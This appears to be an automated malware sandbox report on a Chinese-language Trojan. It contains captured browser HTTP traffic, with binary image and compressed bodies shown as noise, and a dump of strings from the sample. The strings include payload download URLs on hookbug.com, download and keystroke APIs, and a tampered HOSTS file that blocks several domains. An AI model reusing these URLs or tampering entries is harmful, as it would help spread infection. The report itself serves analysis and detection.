}.3.Yk`.f.....P..t.:...F...8...e.....,..........[.Z.Y.,.mQ...M}YE..J%P
}...U.h^........R..K.*skt.$.I.s.....^...b...D5c.yI....o.H}1.U6Kd9.....
I....W.1Y.H.I...9.$....._.......5ca...Y.n.H....~.fdX...H..... 1Z..03."
..VUw.....VH..Ewu...B...R[.\.l..j.......n"s..4$...... . p...5.E...?..y
N..G....W..$i&.I.......7..p.I.........z'.<A..E_...'...\s.A.]......=
......SF......$....j.}....&...D...e..8.NW..u3.X%.Gp...PJ.\r.p.e...
<<< skipped >>>

GET /images/logo/new/soso.png?nv=1&v=2 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:28 GMT
Content-Type: image/png
Content-Length: 3404
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:21:30 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:27 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1ae7a-d4c"
Expires: Tue, 05 Aug 2014 20:32:27 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...P.........)$>^....tEXtSoftware.Adobe ImageReadyq
.e<...iiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0M
pCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmp
tk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        ">
; <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"&
gt; <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/
xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRe
f#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID=
"xmp.did:876c5444-223a-614d-ac26-3c04da56ced6" xmpMM:DocumentID="xmp.d
id:9D1AE99FBFD611E389B7F303B5CA6916" xmpMM:InstanceID="xmp.iid:9D1AE99
EBFD611E389B7F303B5CA6916" xmp:CreatorTool="Adobe Photoshop CC (Window
s)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D33C333AC52E11
E3BAA5ECA415BB5447" stRef:documentID="xmp.did:D33C333BC52E11E3BAA5ECA4
15BB5447"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>.......yIDATx..XiPT..~..nVA.FD6.p...*.q
...D.2.RQ....)...q....DKKE....G..[..,......)..\XD6i.......b.(3..Ts...{
.n.9....M(....do......b.Y..:mm.$.X..wO..)..pbc...&==,.diS...m..??..88s
.@[_H....|.V...../..&.1b..F.^.....$......M...' ..vEM.Z_...u.V'.A9.IW..
.....U.........3g.dee........V.^....s...7....J%.":....z.j...;w........
.......C655.<yR....U........M6..~.H....L....h...83sb..qq.=.xo...a..
...@mJ.|URO.<x..........>|.O.>......#G..x."...1c...G..}..Ejj.
.U....&M.t....{....G...<.NAAAqqq.~.|}} **..C.}HH..Q...........}
<<< skipped >>>

GET /images/ico_icp.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: image/gif
Content-Length: 1139
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:22:42 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:29 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1aec2-473"
Expires: Tue, 05 Aug 2014 20:32:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a...................!..XMP DataXMP<?xpacket begin="..." id="W5
M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:
xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "
> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns
#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com
/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe
 Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:29A259B042D711E3AB
C99BBCDC02AA8E" xmpMM:DocumentID="xmp.did:29A259B142D711E3ABC99BBCDC02
AA8E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:29A259AE42D7
11E3ABC99BBCDC02AA8E" stRef:documentID="xmp.did:29A259AF42D711E3ABC99B
BCDC02AA8E"/> </rdf:Description> </rdf:RDF> </x:xmpm
eta> <?xpacket end="r"?>.....................................
......................................................................
.......................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQP
ONMLKJIHGFEDCBA@?>=<;:9876543210/.-, *)('&%$#"! ................
.................!.......,..........(.."p..N.j..q.|e....L!......s...E.
.8vn.y..;....
<<< skipped >>>

GET /js/sugg_ajaj.v.5.2.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257; SUV=1404660986458226; SNUID=BFBCF1229A9E6415DB3310AF9AEB7C29


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:30 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:30 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:30 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
11a9...............r.6.Wlv.CF4M.m.*...yX..8i...>M."!.6_...-..o..IP.
.M..X,.....I..E..{y.'....u:5..D/.S.L....ft.h.....f,$.,V.'......S.."..2
g.[........Lt.......'...........,....D.i..sB....l^....w./.K.2.z&}O.V..
[email protected].[\.*.`R\.&y.1...,.9....`.....m
.B..Y^..... ..I.......Y.........3...=....BE.A.....^.......o.r.H3.4e...
.N..{z..>Ob.>O5...Y...B.fb....C.....I?.44..m>.......#..=.t.8!
.|............/.zM.V.d..qi.D"2.z.......g.......}.....3..V..F....;...V.
...cB..9....8VNEe.&:,.XQf....g....".=_x0.j0...........2:...}x.U. /X...
-0........EA.)G..$.:.........z$f....`.......Cno..`...m..kZL.,)cO.... .
..\x."v...`k`e..K.:.....r.M.".....FM..'..&..........xD3Y.&.....wI.&1..
^..v.1....k......'....<lGy...h#.^Xi.Ou.GS7N.B.k...3...B....M...;.d8
-p..7.^[email protected]@.Fj.B.A.
...........g.b-(x..d....*x.Q....3....$.uP.Fi...Q.a=..".*.......(.....H
8.CC...rG..6vf. d:...hh...D#f..0.....awP..xET^X.*.W|...L....&.W<. .
..<.-.,..`S.-..T<.Y.@...*...GS..p..Lb..j..{......8:}....b.$....F
.}.b... ..M...d....'...9...`.w.Q..;...-.k.d.&....... .8..f..[cq.#..*U$
....H.......$.@n [email protected]:h ...s...43C8.C/
..m...4c.T....$..sW:u.^......V.|y....3...S...M...N.......g...q........
.X|#........_.X&8{..g.....%...B3.....Ia.j.P...Z...rg..........r.......
T...F%.M...l.zg&...c......k.x.`.Q....S.t........./..1 (c...n.....[...;
.)....6...\.....):.q..f).!...wH....dF4..;..4GrJ...^....ne:.ci....*....
X.`.]T0U.J........0"...u@.>...F.32_..fuy..?.%....)=.B..}..Ti..(
<<< skipped >>>


GET /30d/img/web/logo130826.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: soso.qstatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 16:38:02 GMT
Date: Mon, 30 Jun 2014 16:38:02 GMT
Content-Type: image/png
ETag: "52594142"
Accept-Ranges: bytes
Last-Modified: Mon, 26 Aug 2013 08:32:00 GMT
Cache-Control: max-age=2592000
Content-Length: 2443
Server: WS CDN Server
Age: 1
X-Via: 1.1 zjjhdx33:80 (Cdn Cache Server V2.0), 1.1 lasi18:7 (Cdn Cache Server V2.0)
Connection: keep-alive
.PNG........IHDR.............K-......PLTE...DDEffg...IIJ...QQRMMNFFG..
....[[\.....<.................Nxxy.jZ......e...............TC......
.....@.........^^_iij............KKL............B.....................
O=........a............................F3...wwx.......^M...........a..
u........]......E....Jy....Z......aaa......mmn..9~~...o...XXY.YH......
.....q..h.cS....L9[...............G4qqr..>K..........Ddde}}~......z
z{.....G.........ttt.................T...........s.....q...WWX.....i..
..se................\K...t..........W...........y..............U......
.....................T.......e.....................__`..............R.
...........ccd.....|..k...................J8............eef...||}..z..
..................'..........................}.oa......oop...uuv}.....
.....u..gVVW..........`[email protected][email protected]
x^..c.,M..3..:.m...m..m..m....mk2..o.97b76.>?z:...DuVV..v....V...'.
D.|....p...w~y)3<6.L....9I.K.......I..[....b.m.&.^[email protected]
Z.9`..J...{[email protected].\.1.....^.! ..$....8.$n|..|............S2'
.X..".D`.~..bn...I.4-..4M.z.4rEfkZ..(F..#]....Jj9....8Q.....=By.-E.. ^
..D.}u...vG.Q1.....X..VJ\>......e.pmXYYX...)...-.6|..!...q*4(......
.s..Y(.$........X.. .Ll..V2..)Y..0...]...yt...R....a Y....PT.._.....N.
..v.w8(.......Q......z..~...M..l4.$?XB.w..g.... .....?.A..f...EJv.....
o.,M.d....ns....w...U.5.K..i6...(.d.....K..L6...A.H.v...` .:2.-.......
#.V.....a4..B..N.1...H>`......Ih.g"YLI..9VkO<f.[.D......l..Z....
8......%eT[......z..~.F[`{.R.6 Uir...^..........u'(..$...w(z.`.1..
<<< skipped >>>


GET /wpa/images/group.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.hookbug.com:5151/qunb.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pub.idqqimg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: NWS_UGC_HY
Connection: keep-alive
Date: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Last-Modified: Fri, 12 Apr 2013 09:22:21 GMT
Content-Type: image/png
Content-Length: 1827
X-Cache-Lookup: Hit From Disktank
.PNG........IHDR...Z.........w.{'....PLTEV...dE)r.Ip..........F.......
.F..Kyy...r.....~E ......m..c..........d3.....S.....r...S1...#.....c..
......A..l3....d.............ynvc......"..][email protected]..............&..I
...\BH.....................rHh........z4$...X..0.....R.....s@6...{RL(.
......Xs.y......S........%.........vb...4......bW...[%..........L..t..
s..c>'...2..............wsw..i.............yM...WwaR...?-.fU...~K;.
`H...t..V..:..d...........h/#.......Z74..........pt5(...K...vb=......l
M.........N.kr......I A............pVs..k.....f'.p.....c..%...SG.J;..r
6......fBr..o=5...T..J...jB......5.....|......n^....XLm3#......y.f.}X.
...]6...,y....8..........q.D-Mt....^* z= y>#.dK...^...........>.
.s..J..............B....q...................xy...'..t.....7..M...~Re..
......s: .K(.rP`)..^=.........3......G:V......WE..2.....pHYs..........
.......IDAT8....T.U...lCs..It.....5r,*....I.K.].5p.d....2.4Fw.m}.....e
.v7r.........S.D.IVR.&.....y8G;.................N.r...9.t......p9.....
].......,Ko..i.......Mh.|@..hyw..9...n..qo-....C.....s.fpo..:{..vtQQG.
.......'..zmr.......H...m.u4.;..t...7....C.........a...?....{)...W..4.
..u......(....l..Q.|......R.u.3K.;.!..}vy([.e.~YhG[^. y......C...<.
...~.<-^I3......$..B....z...?$......u...S.7....qF$?.wF..G..lkC#...=
...A...C.......#x...Ea.yvS(..P..e..2..*....yD]]d.\.....{..h.....5.UK.@
J....ux7...>5.H_....}...T]2x,EO7SEmf.6.u:sk(..4...-.,...o6;B...Me. 
.\..._.]SSs..._....?g.,.x.$.tL...)..u.<Mv`4..Q<QiU.1O.X%......q.
.-.w.h... **.....e}..E...'...51t...0...0v....)^1.'.^..U.u`| 3.8l.)
<<< skipped >>>


GET /websearch/features/year.jsp HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: application/x-javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: ABTEST=0|1404678743|v17; expires=Tue, 05-Aug-14 20:32:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=26266BB86914920A0000000053B9B257; expires=Sat, 01-Jul-34 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
30............J.O..M. . /.,I.P7204Q.........i.........0..HTTP/1.1 200 
OK..Server: nginx..Date: Sun, 06 Jul 2014 20:32:23 GMT..Content-Type: 
application/x-javascript; charset=gbk..Transfer-Encoding: chunked..Con
nection: keep-alive..Set-Cookie: ABTEST=0|1404678743|v17; expires=Tue,
 05-Aug-14 20:32:23 GMT; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR
 BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Set-Cookie: IPL
OC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/.
.P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM
 NAV OTC NOI DSP COR"..Set-Cookie: SUID=26266BB86914920A0000000053B9B2
57; expires=Sat, 01-Jul-34 20:32:23 GMT; domain=.sogou.com; path=/..P3
P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NA
V OTC NOI DSP COR"..Expires: Sun, 06 Jul 2014 20:32:23 GMT..Cache-Cont
rol: max-age=0..Content-Encoding: gzip..30............J.O..M. . /.,I.P
7204Q.........i.........0......
<<< skipped >>>

GET /img/fav.ico?6be69b4a-b962-42eb-8324-0d6d8e367010 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.sogou.com
Connection: Keep-Alive
Cookie: ABTEST=0|1404678743|v17; IPLOC=CA; SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:29 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..



GET /net/a/04/link?&url=http://p4.yokacdn.com/pic/cr/2011/0909/10256772.jpg&appid=100520072&referer=hXXp://VVV.yokamen.cn/auto/news/2013/0604089097.shtml HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.store.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=CA; SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:27 GMT
Content-Type: image/jpeg
Content-Length: 8289
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: be34d07853b29896e8638bc2e7118225
Expires: Sun, 27 Jul 2014 15:24:44 GMT
Cache-Control: max-age=2592000
Last-Modified: Fri, 27 Jun 2014 15:24:44 GMT
......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), qu
ality = 95....C.......................................................
.............C........................................................
...............Z....".................................................
...........}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:C
DEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................
......................................................................
.................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*
56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz................................
....................................................?.......)...Ig".!^
=......\..W./.zn..$zm...E......g.#..3...5....3M.][email protected]..#.
..~0~.w....7....Y.V.n.w.N0...z.};....p.. .Q.P.iTv..I...~.Q. VNr|.tZ...
..z..e....5....y`)...9.8...[..^8....G[`.r.4.$h..I..l..(k.o....V...L.&g
t;.o.)bf......u.Am.$dd.y.q.o.H..me.......v.~..W....[K..'...9.e......H.
-..?........I''..w.{_M......y.s.........._.......W.:...:..j-.V....G ..
'..e._.A;O[..=.w..X<U.e|).\1...<qk.N;n`s.........A..W...g...t}..
........i.XE.ZG,......Þ.s.$..G.?.O...]b....qh...@.| .C.....R.S.8.%..
..|~......<4.l.n.Z...z.z....i.....n.~.Kqmm.~....P_.&..}...... ..H..
...V... T.<=g.........kO....W...(.<'%rT....PG.3.g..]..........m.
.-..............28....B.......S.T..~..~....K.......c0)....&.v1.h..R...
0.g.}..;0.*C*R..I.77$...ev.oK.V.y.<.. /h.........:l.T.)....yc...?L.
.B.M.E&....\.....V..5..x..r.....|sf....:].....;..r.....89$rk.....o
<<< skipped >>>


GET /s/blog_b61e00f001016mtd.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: blog.sina.com.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.2.8
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: text/html
Content-Length: 26137
Connection: keep-alive
Vary: Accept-Encoding
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Sun, 06 Jul 2014 20:32:22 GMT
Last-Modified: Sun, 06 Jul 2014 09:58:09 GMT 8
DPOOL_HEADER: 10.55.27.25
SINA-LB: aGwuOTAuc2c1LmphLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS: ZThmOWU0Y2UgMCAwIDAgOSAyMTkK
Age: 66855
X-Cache: HIT from blog-front006.blog.ja.sinanode.com
X-debug: 218.30.115.254
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv
="Content-Type" content="text/html; charset=utf-8" />.<title>
.................._........._............</title>.<meta name=
"keywords" content=".................._........._............,........
.,it" />.<meta name="description" content=".................._..
......._............,.........," />.<meta http-equiv="X-UA-Compa
tible" content="IE=EmulateIE7" />.<meta http-equiv="mobile-agent
" content="format=html5; url=hXXp://blog.sina.cn/dpool/blog/s/blog_b61
e00f001016mtd.html?vt=4">.<meta http-equiv="mobile-agent" conten
t="format=wml; url=hXXp://blog.sina.cn/dpool/blog/ArtRead.php?nid=b61e
00f001016mtd&vt=1">.<!...[if lte IE 6]>.<script type="text
/javascript">.try{.document.execCommand("BackgroundImageCache", fal
se, true);.}catch(e){}.</script>.<![endif]...>.<script 
type="text/javascript">.window.staticTime=new Date().getTime();.<
;/script>.<link rel="pingback" href="hXXp://upload.move.blog.sin
a.com.cn/blog_rebuild/blog/xmlrpc.php" />.<link rel="EditURI" ty
pe="application/rsd xml" title="RSD" href="hXXp://upload.move.blog.sin
a.com.cn/blog_rebuild/blog/xmlrpc.php?rsd" />.<link href="http:/
/blog.sina.com.cn/blog_rebuild/blog/wlwmanifest.xml" type="application
/wlwmanifest xml" rel="wlwmanifest" />.<link rel="alternate"
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_1368:




.text
.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
kernel32.dll
Kernel32.dll
ntdll.dll
user32.dll
Shlwapi.dll
shlwapi.dll
NTDLL.DLL
psapi.dll
advapi32.dll
wsock32.dll
Ws2_32.dll
ws2_32.dll
ole32.dll
atl.dll
OLEACC.DLL
gdiplus.dll
gdi32.dll
MsgWaitForMultipleObjects
CreateWindowStationA
CloseWindowStation
ExitWindowsEx
SetWindowsHookExA
EnumWindows
CreateIoCompletionPort
GdiplusShutdown
RegCreateKeyA
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
www.hixxg.com
http://www.hookbug.com:5151/vip
http://www.hixxg.com
www.hixxg.com
Result=MsgBox ("
(*^__^*)
%System%\XXTS.vbs
\UpData.exe
\unrar.dll
BASEURL
Hotkey
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 52jwyy.com
127.0.0.1 www.52jwyy.com
127.0.0.1 bbs.52jwyy.com
127.0.0.1 au2014.com
127.0.0.1 www.au2014.com
127.0.0.1 92ausf.com
127.0.0.1 www.92ausf.com
127.0.0.1 92jwyy.taobao.com
127.0.0.1 shop105942574.taobao.com
127.0.0.1 jwyywg.d131.tqxq.com
127.0.0.1 www.jwyywg.d131.tqxq.com
127.0.0.1 audition0538.i.sohu.com
127.0.0.1 www.vdisk.cn/au2012fuzhu
127.0.0.1 audition0538.blog.sohu.com
127.0.0.1 9421mm.com
127.0.0.1 www.9421mm.com
return binl2hex(core_md5(str2binl(A), A.length * chrsz))
return binl2str(core_md5(str2binl(A), A.length * chrsz))
for (var C = 0; C < K.length; C  = 16) {
for (var B = 0; B < D.length * chrsz; B  = chrsz) {
C[B >> 5] |= (D.charCodeAt(B / chrsz) & A) << (B % 32)
for (var B = 0; B < C.length * 32; B  = chrsz) {
D  = String.fromCharCode((C[B >> 5] >>> (B % 32)) & A)
for (var A = 0; A < C.length * 4; A  ) {
D  = B.charAt((C[A >> 2] >> ((A % 4) * 8   4)) & 15)   B.charAt((C[A >> 2] >> ((A % 4) * 8)) & 15)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
return(Math.random());
return(date.getTime());
http://www.hixxg.com/
\QQShow.dll
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942_
275816125
2286585953
1149544
*.bak
*.rar
10.0.4
http://blog.sina.com.cn/s/blog_b61e00f001016mtd.html
%System%\Configuration file.ini
%swtV!
%sw8H!
%sw04!
%sw 4!
%sw<(!
%swP.
.rw!~#
S.gzw
Sqlv
Bd .Cd =Cd [Bd MCd
r.SQeq
urlmon.dll
unrar.dll
URLDownloadToCacheFileA
URLDownloadToFileA
RARSetPassword
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
.iqW>
"3/%F
QChttp://www.hookbug.com:5151/jwxx.rar
`.rdata
@.reloc
t-f9}
%.*s(%d)%s
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb
GetCPInfo
KERNEL32.dll
ADVAPI32.dll
GetConsoleOutputCP
jwxx.rar
jwxx.exe
http://www.hookbug.com:5151/new_mf.html
mGOY%f
io.HRI
h:\&=
y?^i.HU
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
#include "l.chs\afxres.rc" // Standard components
=f%7s
http://shang.qq.com/wpa/qunwpa?idkey=f67ec2ba2cd402abd4c0bc9d75ca8854c46a5486eab2f0e310dc7d29e32ea85d
.data
%um %
m %xn
%xt"0
Mm %st"
%s]OL
m %st"
l %st"
om %x
m %u`
%xt",
%s]$9
m %xm %~`
m %ut"
Mm %ut"0
.zzf.
m %st",
%um %tR
%st",
%x]@F
%sm %
m %u]
7Lm %u
m %pm %s]
m %s]3
%xt"4
%xm %
l %x`
m %x`
m %um %
m %x-
%s];&
m %s`
l %xt"
#0m %xt"
%sm %ut" e}
'N]%s
m %s<
m %ut"
%xm %t
m %sm %
l %s`
m %st
m %sn
%xt" e}
%qm %x
%pm %u
Mm %s
m %x0
m %st"
Mm %s]I&
%ut"4
m %xt"0
%xm %n
,178*(/5
%fu8&M
yfx`%d
u`.du
.yze.
#/b.cI
~8%St
%fu6e
%fv85
v!.fu
4z.sh
y.tOt
%fu:p
%fu8f
p|8%fv
%fu6h
%fu8%
#eõ
kn%fy
'L]%s
w8%f}
.pys'
"07z%x
Qkp%S
v".fv
5!.fv
t".Rt
5!.Lt
~6%fv
p{8%fv
GetAsyncKeyState
{B6F7542F-B8FE-46a8-9605-98856A687097}
http://www.hookbug.com:5151/vip/
-Www.52jwxx.Com
0000000000000000
0000000
d-WWW.HIXXG.COM
00 00 17 01
http://www.hookbug.com:5151
*.dll
À-#R4d
/'*w4l%X89
%s)l)*%
%d%V&
%U3e)
,50,100,150
http://www.hookbug.com:5151/jiezhi/
W WWW.52JWXX.COM
AKernel32.dll
:197774811
http://www.hookbug.com:5151/qunb.htmls
http://www.hookbug.com:5151/qq.htmls
http://www.hookbug.com:5151/vip.rar
http://www.hixxg.com/xiazai.html
http://bbs.52jwxx.com/
WWW.HIXXG.COM
W www.hixxg.com
%*.*f
windows
MSWHEEL_ROLLMSG
RASAPI32.dll
GetWindowsDirectoryA
EnumChildWindows
oledlg.dll
WSOCK32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
QQShow.dll
197774811
0.0.0.0
